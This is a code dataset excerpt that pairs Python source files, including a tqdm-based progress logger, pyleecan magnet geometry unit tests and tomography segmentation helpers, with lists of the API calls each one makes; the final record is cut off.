| [((49, 298), 'models.contact.Contact', 'Contact', ([], {'first_name': '"""Firstname"""', 'last_name': '"""Lastname"""', 'mobile_phone': '"""+12345678"""', 'work_phone': '"""12345"""', 'home_phone': '"""67890"""', 'fax': '"""55443322"""', 'email_1': '"""<EMAIL>"""', 'email_2': '"""<EMAIL>"""', 'email_3': '"""<EMAIL>"""', 'address': '"""Street, 15 \n 12345 New-York"""'}), '(first_name=\'Firstname\', last_name=\'Lastname\', mobile_phone=\n \'+12345678\', work_phone=\'12345\', home_phone=\'67890\', fax=\'55443322\',\n email_1=\'<EMAIL>\', email_2=\'<EMAIL>\', email_3=\'<EMAIL>\', address=\n """Street, 15 \n 12345 New-York""")\n', (56, 298), False, 'from models.contact import Contact\n')] |
"""Implements the generic progress logger class, and the ProgressBar class.
"""
from tqdm import tqdm, tqdm_notebook
from collections import OrderedDict
import time
SETTINGS = {
'notebook': False
}
def notebook(turn='on'):
SETTINGS['notebook'] = True if (turn == 'on') else False
def troncate_string(s, max_length=25):
return s if (len(s) < max_length) else (s[:max_length] + "...")
class ProgressLogger:
"""Generic class for progress loggers.
A progress logger contains a "state" dictionnary.
Parameters
----------
init_state
Dictionnary representing the initial state.
"""
def __init__(self, init_state=None):
self.state = {}
self.stored = {}
self.logs = []
self.log_indent = 0
if init_state is not None:
self.state.update(init_state)
def log(self, message):
self.logs.append((' ' * self.log_indent) + message)
def dump_logs(self, filepath=None):
if filepath is not None:
with open(filepath, 'a') as f:
f.write("\n".join(self.logs))
else:
return "\n".join(self.logs)
def callback(self, **kw):
"""Execute something after the state has been updated by the given
state elements.
This default callback does nothing, overwrite it by subclassing
"""
pass
def store(self, **kw):
"""Store objects in the logger and trigger ``self.store_callback``.
This works exactly like ``logger()``, but the later is meant for simple
data objects (text, numbers) that will be sent over the network or
written to a file. The ``store`` method expects rather large objects
which are not necessarily serializable, and will be used eg to draw
plots on the fly.
"""
self.stored.update(kw)
self.store_callback(**kw)
def store_callback(self, **kw):
"""Execute something after the store has been updated by the given
state elements.
This default callback does nothing, overwrite it by subclassing
"""
pass
def iter(self, **kw):
"""Iterate through a list while updating the state.
Examples
--------
>>> for username in logger.iter(user=['tom', 'tim', 'lea']:
>>> # At every loop, logger.state['user'] is updated
>>> print (username)
"""
for field, iterable in kw.items():
for it in iterable:
self(**{field: it})
yield it
def __call__(self, **kw):
self.state.update(kw)
self.callback(**kw)
class ProgressBarLogger(ProgressLogger):
"""Generic class for progress loggers.
A progress logger contains a "state" dictionnary
Parameters
----------
init_state
Initial state of the logger
bars
Either None (will be initialized with no bar) or a list/tuple of bar
names (``['main', 'sub']``) which will be initialized with index -1 and
no total, or a dictionary (possibly ordered) of bars, of the form
``{bar_1: {title: 'bar1', index: 2, total:23}, bar_2: {...}}``
ignored_bars
Either None (newly met bars will be added) or a list of blacklisted bar
names, or ``'all_others'`` to signify that all bar names not already in
``self.bars`` will be ignored.
"""
bar_indent = 2
def __init__(self, init_state=None, bars=None, ignored_bars=None,
logged_bars='all', min_time_interval=0, ignore_bars_under=0):
ProgressLogger.__init__(self, init_state)
if bars is None:
bars = OrderedDict()
elif isinstance(bars, (list, tuple)):
bars = OrderedDict([
(b, dict(title=b, index=-1, total=None, message=None,
indent=0))
for b in bars
])
if isinstance(ignored_bars, (list, tuple)):
ignored_bars = set(ignored_bars)
self.ignored_bars = ignored_bars
self.logged_bars = logged_bars
self.state['bars'] = bars
self.min_time_interval = min_time_interval
self.ignore_bars_under = ignore_bars_under
@property
def bars(self):
"""Return ``self.state['bars'].``"""
return self.state['bars']
def bar_is_ignored(self, bar):
if self.ignored_bars is None:
return False
elif self.ignored_bars == 'all_others':
return (bar not in self.bars)
else:
return bar in self.ignored_bars
def bar_is_logged(self, bar):
if (not self.logged_bars):
return False
elif self.logged_bars == 'all':
return True
else:
return bar in self.logged_bars
def iterable_is_too_short(self, iterable):
length = len(iterable) if hasattr(iterable, '__len__') else None
return (length is not None) and (length < self.ignore_bars_under)
def iter_bar(self, bar_prefix='', **kw):
"""Iterate through a list while updating a state bar.
Examples
--------
>>> for username in logger.iter_bar(user=['tom', 'tim', 'lea']):
>>> # At every loop, logger.state['bars']['user'] is updated
>>> # to {index: i, total: 3, title:'user'}
>>> print (username)
"""
if 'bar_message' in kw:
bar_message = kw.pop('bar_message')
else:
bar_message = None
bar, iterable = kw.popitem()
if self.bar_is_ignored(bar) or self.iterable_is_too_short(iterable):
return iterable
bar = bar_prefix + bar
if hasattr(iterable, '__len__'):
self(**{bar + '__total': len(iterable)})
def new_iterable():
last_time = time.time()
i = 0 # necessary in case the iterator is empty
for i, it in enumerate(iterable):
now_time = time.time()
if (i == 0) or (now_time - last_time > self.min_time_interval):
if bar_message is not None:
self(**{bar + '__message': bar_message(it)})
self(**{bar + '__index': i})
last_time = now_time
yield it
if self.bars[bar]['index'] != i:
self(**{bar + '__index': i})
self(**{bar + '__index': i + 1})
return new_iterable()
def bars_callback(self, bar, attr, value, old_value=None):
"""Execute a custom action after the progress bars are updated.
Parameters
----------
bar
Name/ID of the bar to be modified.
attr
Attribute of the bar attribute to be modified
value
New value of the attribute
old_value
Previous value of this bar's attribute.
This default callback does nothing, overwrite it by subclassing.
"""
pass
def __call__(self, **kw):
items = sorted(kw.items(), key=lambda kv: not kv[0].endswith('total'))
for key, value in items:
if '__' in key:
bar, attr = key.split('__')
if self.bar_is_ignored(bar):
continue
kw.pop(key)
if bar not in self.bars:
self.bars[bar] = dict(title=bar, index=-1,
total=None, message=None)
old_value = self.bars[bar][attr]
if self.bar_is_logged(bar):
new_bar = (attr == 'index') and (value < old_value)
if (attr == 'total') or (new_bar):
self.bars[bar]['indent'] = self.log_indent
else:
self.log_indent = self.bars[bar]['indent']
self.log("[%s] %s: %s" % (bar, attr, value))
self.log_indent += self.bar_indent
self.bars[bar][attr] = value
self.bars_callback(bar, attr, value, old_value)
self.state.update(kw)
self.callback(**kw)
class TqdmProgressBarLogger(ProgressBarLogger):
"""Tqdm-powered progress bar for console or Notebooks.
Parameters
----------
init_state
Initial state of the logger
bars
Either None (will be initialized with no bar) or a list/tuple of bar
names (``['main', 'sub']``) which will be initialized with index -1 and
no total, or a dictionary (possibly ordered) of bars, of the form
``{bar_1: {title: 'bar1', index: 2, total:23}, bar_2: {...}}``
ignored_bars
Either None (newly met bars will be added) or a list of blacklisted bar
names, or ``'all_others'`` to signify that all bar names not already in
``self.bars`` will be ignored.
leave_bars
notebook
True will make the bars look nice (HTML) in the jupyter notebook. It is
advised to leave to 'default' as the default can be globally set from
inside a notebook with ``import proglog; proglog.notebook_mode()``.
print_messages
If True, every ``logger(message='something')`` will print a message in
the console / notebook
"""
def __init__(self, init_state=None, bars=None, leave_bars=False,
ignored_bars=None, logged_bars='all', notebook='default',
print_messages=True, min_time_interval=0,
ignore_bars_under=0):
ProgressBarLogger.__init__(self, init_state=init_state, bars=bars,
ignored_bars=ignored_bars,
logged_bars=logged_bars,
ignore_bars_under=ignore_bars_under,
min_time_interval=min_time_interval)
self.leave_bars = leave_bars
self.tqdm_bars = OrderedDict([
(bar, None)
for bar in self.bars
])
if notebook == 'default':
notebook = SETTINGS['notebook']
self.notebook = notebook
self.print_messages = print_messages
self.tqdm = (tqdm_notebook if self.notebook else tqdm)
def new_tqdm_bar(self, bar):
"""Create a new tqdm bar, possibly replacing an existing one."""
if (bar in self.tqdm_bars) and (self.tqdm_bars[bar] is not None):
self.close_tqdm_bar(bar)
infos = self.bars[bar]
self.tqdm_bars[bar] = self.tqdm(
total=infos['total'],
desc=infos['title'],
postfix=dict(now=troncate_string(str(infos['message']))),
leave=self.leave_bars
)
def close_tqdm_bar(self, bar):
"""Close and erase the tqdm bar"""
self.tqdm_bars[bar].close()
if not self.notebook:
self.tqdm_bars[bar] = None
def bars_callback(self, bar, attr, value, old_value):
if (bar not in self.tqdm_bars) or (self.tqdm_bars[bar] is None):
self.new_tqdm_bar(bar)
if attr == 'index':
if value >= old_value:
total = self.bars[bar]['total']
if total and (value >= total):
self.close_tqdm_bar(bar)
else:
self.tqdm_bars[bar].update(value - old_value)
else:
self.new_tqdm_bar(bar)
self.tqdm_bars[bar].update(value + 1)
elif attr == 'message':
self.tqdm_bars[bar].set_postfix(now=troncate_string(str(value)))
self.tqdm_bars[bar].update(0)
def callback(self, **kw):
if self.print_messages and ('message' in kw) and kw['message']:
if self.notebook:
print(kw['message'])
else:
self.tqdm.write(kw['message'])
class RqWorkerProgressLogger:
def __init__(self, job):
self.job = job
if 'progress_data' not in self.job.meta:
self.job.meta['progress_data'] = {}
self.job.save()
def callback(self, **kw):
self.job.meta['progress_data'] = self.state
self.job.save()
class RqWorkerBarLogger(RqWorkerProgressLogger, ProgressBarLogger):
def __init__(self, job, init_state=None, bars=None, ignored_bars=(),
logged_bars='all', min_time_interval=0):
RqWorkerProgressLogger.__init__(self, job)
ProgressBarLogger.__init__(self, init_state=init_state, bars=bars,
ignored_bars=ignored_bars,
logged_bars=logged_bars,
min_time_interval=min_time_interval)
class MuteProgressBarLogger(ProgressBarLogger):
def bar_is_ignored(self, bar):
return True
def default_bar_logger(logger, bars=None, ignored_bars=None, logged_bars='all',
min_time_interval=0, ignore_bars_under=0):
if logger == 'bar':
return TqdmProgressBarLogger(
bars=bars,
ignored_bars=ignored_bars,
logged_bars=logged_bars,
min_time_interval=min_time_interval,
ignore_bars_under=ignore_bars_under
)
elif logger is None:
return MuteProgressBarLogger()
else:
return logger
| [
"collections.OrderedDict",
"time.time"
]
| [((9891, 9938), 'collections.OrderedDict', 'OrderedDict', (['[(bar, None) for bar in self.bars]'], {}), '([(bar, None) for bar in self.bars])\n', (9902, 9938), False, 'from collections import OrderedDict\n'), ((3666, 3679), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3677, 3679), False, 'from collections import OrderedDict\n'), ((5832, 5843), 'time.time', 'time.time', ([], {}), '()\n', (5841, 5843), False, 'import time\n'), ((5977, 5988), 'time.time', 'time.time', ([], {}), '()\n', (5986, 5988), False, 'import time\n')] |
# -*- coding: utf-8 -*-
"""
@date Created on Thu Dec 18 13:56:33 2014
@copyright (C) 2014-2015 EOMYS ENGINEERING.
@author pierre_b
"""
from unittest import TestCase
from ddt import ddt, data
from pyleecan.Classes.Arc1 import Arc1
from pyleecan.Classes.Segment import Segment
from pyleecan.Classes.MagnetType11 import MagnetType11
from pyleecan.Classes.LamSlotMag import LamSlotMag
from pyleecan.Classes.SlotMPolar import SlotMPolar
from numpy import pi, exp, angle, array
from pyleecan.Methods.Machine.Magnet.comp_surface import comp_surface
Mag11_test = list()
# Internal Slot surface
lam = LamSlotMag(is_internal=True, Rext=0.5)
lam.slot = SlotMPolar(H0=0, W0=pi / 4, Zs=4)
lam.slot.magnet = [MagnetType11(Hmag=1, Wmag=pi / 4)]
Mag11_test.append({"test_obj": lam, "S_exp": 0.78539616, "Ao": pi / 4, "H_exp": 1})
# Internal Slot inset
lam = LamSlotMag(is_internal=True, Rext=0.5)
lam.slot = SlotMPolar(H0=40e-3, W0=pi / 4, Zs=4)
lam.slot.magnet = [MagnetType11(Hmag=20e-3, Wmag=pi / 4)]
Mag11_test.append({"test_obj": lam, "S_exp": 7.3827e-3, "Ao": pi / 4, "H_exp": 20e-3})
# Outward Slot inset
lam = LamSlotMag(is_internal=False, Rext=0.1325)
lam.slot = SlotMPolar(H0=5e-3, W0=pi / 10, Zs=8)
lam.slot.magnet = [MagnetType11(Hmag=8e-3, Wmag=pi / 12)]
Mag11_test.append({"test_obj": lam, "S_exp": 2.09439e-6, "Ao": pi / 12, "H_exp": 8e-3})
# For AlmostEqual
DELTA = 1e-4
@ddt
class test_Magnet_Type_11_meth(TestCase):
"""unittest for MagnetType11 methods
"""
@data(*Mag11_test)
def test_comp_surface(self, test_dict):
"""Check that the computation of the surface is correct
"""
test_obj = test_dict["test_obj"]
result = test_obj.slot.magnet[0].comp_surface()
a = result
b = test_dict["S_exp"]
msg = "Return " + str(a) + " expected " + str(b)
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)
# Compare numerical and analytical results
b = comp_surface(test_obj.slot.magnet[0])
msg = "Analytical: " + str(a) + " Numerical " + str(b)
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)
@data(*Mag11_test)
def test_comp_height(self, test_dict):
"""Check that the computation of the height is correct
"""
test_obj = test_dict["test_obj"]
result = test_obj.slot.magnet[0].comp_height()
a = result
b = test_dict["H_exp"]
msg = "Return " + str(a) + " expected " + str(b)
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)
@data(*Mag11_test)
def test_comp_angle_op(self, test_dict):
"""Check that the computation of the opening angle is correct
"""
test_obj = test_dict["test_obj"]
result = test_obj.slot.magnet[0].comp_angle_opening()
a = result
b = test_dict["Ao"]
msg = "Return " + str(a) + " expected " + str(b)
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)
def test_build_geometry_out(self):
"""check that curve_list is correct (outwards magnet)"""
lam = LamSlotMag(
Rint=40e-3,
Rext=90e-3,
is_internal=False,
is_stator=False,
L1=0.45,
Nrvd=1,
Wrvd=0.05,
)
magnet = [MagnetType11(Wmag=pi / 10, Hmag=0.2)]
lam.slot = SlotMPolar(Zs=8, W0=pi / 10, H0=0.2, magnet=magnet)
test_obj = lam.slot.magnet[0]
Z1 = (40e-3 + 0.2) * exp(-1j * pi / 10 / 2)
Z2 = (40e-3 + 0.2) * exp(1j * pi / 10 / 2)
Z = abs(Z1)
Z3 = (Z - 0.2) * exp(1j * angle(Z1))
Z4 = (Z - 0.2) * exp(1j * angle(Z2))
# # Creation of curve
curve_list = list()
curve_list.append(Segment(Z1, Z3))
curve_list.append(Arc1(Z3, Z4, abs(Z3)))
curve_list.append(Segment(Z4, Z2))
curve_list.append(Arc1(Z2, Z1, -abs(Z2)))
surface = test_obj.build_geometry()
result = surface[0].get_lines()
for i in range(0, len(result)):
a = result[i].begin
b = curve_list[i].begin
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA)
a = result[i].end
b = curve_list[i].end
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA)
def test_build_geometry_in(self):
"""check that curve_list is correct (inwards magnet)"""
lam = LamSlotMag(
Rint=40e-1,
Rext=90e-1,
is_internal=True,
is_stator=False,
L1=0.45,
Nrvd=1,
Wrvd=0.05,
)
magnet = [MagnetType11(Wmag=pi / 10, Hmag=0.2)]
lam.slot = SlotMPolar(Zs=8, W0=pi / 10, H0=0.2, magnet=magnet)
test_obj = lam.slot.magnet[0]
Z1 = (90e-1 - 0.2) * exp(-1j * pi / 10 / 2)
Z2 = (90e-1 - 0.2) * exp(1j * pi / 10 / 2)
Z = abs(Z1)
Z3 = (Z + 0.2) * exp(1j * angle(Z1))
Z4 = (Z + 0.2) * exp(1j * angle(Z2))
# # Creation of curve
curve_list = list()
curve_list.append(Segment(Z1, Z3))
curve_list.append(Arc1(Z3, Z4, abs(Z3)))
curve_list.append(Segment(Z4, Z2))
curve_list.append(Arc1(Z2, Z1, -abs(Z2)))
surface = test_obj.build_geometry()
result = surface[0].get_lines()
for i in range(0, len(result)):
a = result[i].begin
b = curve_list[i].begin
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA)
a = result[i].end
b = curve_list[i].end
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA)
| [
"pyleecan.Methods.Machine.Magnet.comp_surface.comp_surface",
"pyleecan.Classes.LamSlotMag.LamSlotMag",
"numpy.angle",
"numpy.exp",
"pyleecan.Classes.Segment.Segment",
"ddt.data",
"pyleecan.Classes.SlotMPolar.SlotMPolar",
"pyleecan.Classes.MagnetType11.MagnetType11"
]
| [((598, 636), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'is_internal': '(True)', 'Rext': '(0.5)'}), '(is_internal=True, Rext=0.5)\n', (608, 636), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((648, 681), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'H0': '(0)', 'W0': '(pi / 4)', 'Zs': '(4)'}), '(H0=0, W0=pi / 4, Zs=4)\n', (658, 681), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((849, 887), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'is_internal': '(True)', 'Rext': '(0.5)'}), '(is_internal=True, Rext=0.5)\n', (859, 887), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((899, 935), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'H0': '(0.04)', 'W0': '(pi / 4)', 'Zs': '(4)'}), '(H0=0.04, W0=pi / 4, Zs=4)\n', (909, 935), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((1110, 1152), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'is_internal': '(False)', 'Rext': '(0.1325)'}), '(is_internal=False, Rext=0.1325)\n', (1120, 1152), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((1164, 1202), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'H0': '(0.005)', 'W0': '(pi / 10)', 'Zs': '(8)'}), '(H0=0.005, W0=pi / 10, Zs=8)\n', (1174, 1202), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((701, 734), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Hmag': '(1)', 'Wmag': '(pi / 4)'}), '(Hmag=1, Wmag=pi / 4)\n', (713, 734), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((956, 992), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Hmag': '(0.02)', 'Wmag': '(pi / 4)'}), '(Hmag=0.02, Wmag=pi / 4)\n', (968, 992), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((1221, 1259), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Hmag': '(0.008)', 'Wmag': '(pi / 12)'}), '(Hmag=0.008, Wmag=pi / 12)\n', (1233, 1259), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((1484, 1501), 'ddt.data', 'data', (['*Mag11_test'], {}), '(*Mag11_test)\n', (1488, 1501), False, 'from ddt import ddt, data\n'), ((2136, 2153), 'ddt.data', 'data', (['*Mag11_test'], {}), '(*Mag11_test)\n', (2140, 2153), False, 'from ddt import ddt, data\n'), ((2551, 2568), 'ddt.data', 'data', (['*Mag11_test'], {}), '(*Mag11_test)\n', (2555, 2568), False, 'from ddt import ddt, data\n'), ((1960, 1997), 'pyleecan.Methods.Machine.Magnet.comp_surface.comp_surface', 'comp_surface', (['test_obj.slot.magnet[0]'], {}), '(test_obj.slot.magnet[0])\n', (1972, 1997), False, 'from pyleecan.Methods.Machine.Magnet.comp_surface import comp_surface\n'), ((3092, 3193), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'Rint': '(0.04)', 'Rext': '(0.09)', 'is_internal': '(False)', 'is_stator': '(False)', 'L1': '(0.45)', 'Nrvd': '(1)', 'Wrvd': '(0.05)'}), '(Rint=0.04, Rext=0.09, is_internal=False, is_stator=False, L1=\n 0.45, Nrvd=1, Wrvd=0.05)\n', (3102, 3193), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((3361, 3412), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'Zs': '(8)', 'W0': '(pi / 10)', 'H0': '(0.2)', 'magnet': 'magnet'}), '(Zs=8, W0=pi / 10, H0=0.2, magnet=magnet)\n', (3371, 3412), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((4413, 4510), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'Rint': '(4.0)', 'Rext': '(9.0)', 'is_internal': '(True)', 'is_stator': '(False)', 'L1': '(0.45)', 'Nrvd': '(1)', 'Wrvd': '(0.05)'}), '(Rint=4.0, Rext=9.0, is_internal=True, is_stator=False, L1=0.45,\n Nrvd=1, Wrvd=0.05)\n', (4423, 4510), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((4681, 4732), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'Zs': '(8)', 'W0': '(pi / 10)', 'H0': '(0.2)', 'magnet': 'magnet'}), '(Zs=8, W0=pi / 10, H0=0.2, magnet=magnet)\n', (4691, 4732), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((3304, 3340), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Wmag': '(pi / 10)', 'Hmag': '(0.2)'}), '(Wmag=pi / 10, Hmag=0.2)\n', (3316, 3340), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((3480, 3504), 'numpy.exp', 'exp', (['(-1.0j * pi / 10 / 2)'], {}), '(-1.0j * pi / 10 / 2)\n', (3483, 3504), False, 'from numpy import pi, exp, angle, array\n'), ((3532, 3555), 'numpy.exp', 'exp', (['(1.0j * pi / 10 / 2)'], {}), '(1.0j * pi / 10 / 2)\n', (3535, 3555), False, 'from numpy import pi, exp, angle, array\n'), ((3751, 3766), 'pyleecan.Classes.Segment.Segment', 'Segment', (['Z1', 'Z3'], {}), '(Z1, Z3)\n', (3758, 3766), False, 'from pyleecan.Classes.Segment import Segment\n'), ((3843, 3858), 'pyleecan.Classes.Segment.Segment', 'Segment', (['Z4', 'Z2'], {}), '(Z4, Z2)\n', (3850, 3858), False, 'from pyleecan.Classes.Segment import Segment\n'), ((4624, 4660), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Wmag': '(pi / 10)', 'Hmag': '(0.2)'}), '(Wmag=pi / 10, Hmag=0.2)\n', (4636, 4660), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((4800, 4824), 'numpy.exp', 'exp', (['(-1.0j * pi / 10 / 2)'], {}), '(-1.0j * pi / 10 / 2)\n', (4803, 4824), False, 'from numpy import pi, exp, angle, array\n'), ((4852, 4875), 'numpy.exp', 'exp', (['(1.0j * pi / 10 / 2)'], {}), '(1.0j * pi / 10 / 2)\n', (4855, 4875), False, 'from numpy import pi, exp, angle, array\n'), ((5071, 5086), 'pyleecan.Classes.Segment.Segment', 'Segment', (['Z1', 'Z3'], {}), '(Z1, Z3)\n', (5078, 5086), False, 'from pyleecan.Classes.Segment import Segment\n'), ((5163, 5178), 'pyleecan.Classes.Segment.Segment', 'Segment', (['Z4', 'Z2'], {}), '(Z4, Z2)\n', (5170, 5178), False, 'from pyleecan.Classes.Segment import Segment\n'), ((3610, 3619), 'numpy.angle', 'angle', (['Z1'], {}), '(Z1)\n', (3615, 3619), False, 'from numpy import pi, exp, angle, array\n'), ((3655, 3664), 'numpy.angle', 'angle', (['Z2'], {}), '(Z2)\n', (3660, 3664), False, 'from numpy import pi, exp, angle, array\n'), ((4930, 4939), 'numpy.angle', 'angle', (['Z1'], {}), '(Z1)\n', (4935, 4939), False, 'from numpy import pi, exp, angle, array\n'), ((4975, 4984), 'numpy.angle', 'angle', (['Z2'], {}), '(Z2)\n', (4980, 4984), False, 'from numpy import pi, exp, angle, array\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
from operator import mod
from tomo_encoders.misc.voxel_processing import modified_autocontrast, TimerGPU
from tomo_encoders.reconstruction.recon import recon_patches_3d
import cupy as cp
import numpy as np
from skimage.filters import threshold_otsu
from tomo_encoders import Grid
def get_values_cyl_mask(vol, mask_fac):
vol_shape = vol.shape
assert vol_shape[1] == vol_shape[2], "must be a tomographic volume where shape y = shape x"
shape_yx = vol_shape[1]
shape_z = vol_shape[0]
rad = int(mask_fac*shape_yx/2)
pts = cp.arange(-int(shape_yx//2), int(cp.ceil(shape_yx//2)))
yy, xx = cp.meshgrid(pts, pts, indexing = 'ij')
circ = (cp.sqrt(yy**2 + xx**2) < rad).astype(cp.uint8) # inside is positive
circ = circ[cp.newaxis, ...]
cyl = cp.repeat(circ, shape_z, axis = 0)
return vol[cyl > 0]
def cylindrical_mask(out_vol, mask_fac, mask_val = 0):
vol_shape = out_vol.shape
assert vol_shape[1] == vol_shape[2], "must be a tomographic volume where shape y = shape x"
shape_yx = vol_shape[1]
shape_z = vol_shape[0]
rad = int(mask_fac*shape_yx/2)
pts = cp.arange(-int(shape_yx//2), int(cp.ceil(shape_yx//2)))
yy, xx = cp.meshgrid(pts, pts, indexing = 'ij')
circ = (cp.sqrt(yy**2 + xx**2) < rad).astype(cp.uint8) # inside is positive
circ = circ[cp.newaxis, ...]
cyl = cp.repeat(circ, shape_z, axis = 0)
out_vol[cyl == 0] = mask_val
return
def segment_otsu(vol, s = 0.05):
'''segment volume with otsu'''
timer = TimerGPU()
timer.tic()
tmp_values = vol[::4,::4,::4].get()
# rec_min_max = modified_autocontrast(tmp_values, s = s, normalize_sampling_factor=1)
thresh = cp.float32(threshold_otsu(tmp_values.reshape(-1)))
vol = (vol < thresh).astype(cp.uint8)
timer.toc("otsu thresholding")
return vol
def edge_map(Y):
'''
this algorithm was inspired by: https://github.com/tomochallenge/tomochallenge_utils/blob/master/foam_phantom_utils.py
'''
msk = cp.zeros_like(Y)
tmp = Y[:-1]!=Y[1:]
msk[:-1][tmp] = 1
msk[1:][tmp] = 1
tmp = Y[:,:-1]!=Y[:,1:]
msk[:,:-1][tmp] = 1
msk[:,1:][tmp] = 1
tmp = Y[:,:,:-1]!=Y[:,:,1:]
msk[:,:,:-1][tmp] = 1
msk[:,:,1:][tmp] = 1
return msk > 0
def guess_surface(V_bin, b, wd):
# find patches on surface
wdb = int(wd//b)
p3d = Grid(V_bin.shape, width = wdb)
x = p3d.extract(V_bin)
is_surf = (np.std(x, axis = (1,2,3)) > 0.0)
is_ones = (np.sum(x, axis = (1,2,3))/(wdb**3) == 1)
is_zeros = (np.sum(x, axis = (1,2,3))/(wdb**3) == 0)
p3d = p3d.rescale(b)
p3d_surf = p3d.filter_by_condition(is_surf)
p3d_ones = p3d.filter_by_condition(is_ones)
p3d_zeros = p3d.filter_by_condition(is_zeros)
eff = len(p3d_surf)*(wd**3)/np.prod(p3d_surf.vol_shape)
print(f"\tSTAT: r value: {eff*100.0:.2f}")
return p3d_surf, p3d_ones, p3d_zeros
def process_patches(projs, theta, center, fe, p_surf, min_max, TIMEIT = False):
# SCHEME 1: integrate reconstruction and segmention (segments data on gpu itself)
# st_proc = cp.cuda.Event(); end_proc = cp.cuda.Event(); st_proc.record()
# x_surf, p_surf = recon_patches_3d(projs, theta, center, p_surf, \
# apply_fbp = True, segmenter = fe, \
# segmenter_batch_size = 256)
# end_proc.record(); end_proc.synchronize(); t_surf = cp.cuda.get_elapsed_time(st_proc,end_proc)
# SCHEME 2: reconstruct and segment separately (copies rec data from gpu to cpu)
st_rec = cp.cuda.Event(); end_rec = cp.cuda.Event(); st_rec.record()
x_surf, p_surf = recon_patches_3d(projs, theta, center, p_surf, \
apply_fbp =True)
end_rec.record(); end_rec.synchronize(); t_rec = cp.cuda.get_elapsed_time(st_rec,end_rec)
st_seg = cp.cuda.Event(); end_seg = cp.cuda.Event(); st_seg.record()
x_surf = np.clip(x_surf, *min_max)
x_surf = fe.predict_patches("segmenter", x_surf[...,np.newaxis], 256, None, min_max = min_max)[...,0]
end_seg.record(); end_seg.synchronize(); t_seg = cp.cuda.get_elapsed_time(st_seg,end_seg)
print(f'\tTIME: local reconstruction - {t_rec/1000.0:.2f} secs')
print(f'\tTIME: local segmentation - {t_seg/1000.0:.2f} secs')
print(f'\tSTAT: total patches in neighborhood: {len(p_surf)}')
if TIMEIT:
return x_surf, p_surf, t_rec, t_seg
else:
return x_surf, p_surf
| [
"cupy.zeros_like",
"numpy.clip",
"numpy.prod",
"tomo_encoders.misc.voxel_processing.TimerGPU",
"tomo_encoders.Grid",
"cupy.cuda.get_elapsed_time",
"cupy.repeat",
"numpy.sum",
"tomo_encoders.reconstruction.recon.recon_patches_3d",
"cupy.sqrt",
"cupy.meshgrid",
"numpy.std",
"cupy.cuda.Event",
"cupy.ceil"
]
| [((688, 724), 'cupy.meshgrid', 'cp.meshgrid', (['pts', 'pts'], {'indexing': '"""ij"""'}), "(pts, pts, indexing='ij')\n", (699, 724), True, 'import cupy as cp\n'), ((850, 882), 'cupy.repeat', 'cp.repeat', (['circ', 'shape_z'], {'axis': '(0)'}), '(circ, shape_z, axis=0)\n', (859, 882), True, 'import cupy as cp\n'), ((1276, 1312), 'cupy.meshgrid', 'cp.meshgrid', (['pts', 'pts'], {'indexing': '"""ij"""'}), "(pts, pts, indexing='ij')\n", (1287, 1312), True, 'import cupy as cp\n'), ((1438, 1470), 'cupy.repeat', 'cp.repeat', (['circ', 'shape_z'], {'axis': '(0)'}), '(circ, shape_z, axis=0)\n', (1447, 1470), True, 'import cupy as cp\n'), ((1604, 1614), 'tomo_encoders.misc.voxel_processing.TimerGPU', 'TimerGPU', ([], {}), '()\n', (1612, 1614), False, 'from tomo_encoders.misc.voxel_processing import modified_autocontrast, TimerGPU\n'), ((2085, 2101), 'cupy.zeros_like', 'cp.zeros_like', (['Y'], {}), '(Y)\n', (2098, 2101), True, 'import cupy as cp\n'), ((2446, 2474), 'tomo_encoders.Grid', 'Grid', (['V_bin.shape'], {'width': 'wdb'}), '(V_bin.shape, width=wdb)\n', (2450, 2474), False, 'from tomo_encoders import Grid\n'), ((3673, 3688), 'cupy.cuda.Event', 'cp.cuda.Event', ([], {}), '()\n', (3686, 3688), True, 'import cupy as cp\n'), ((3700, 3715), 'cupy.cuda.Event', 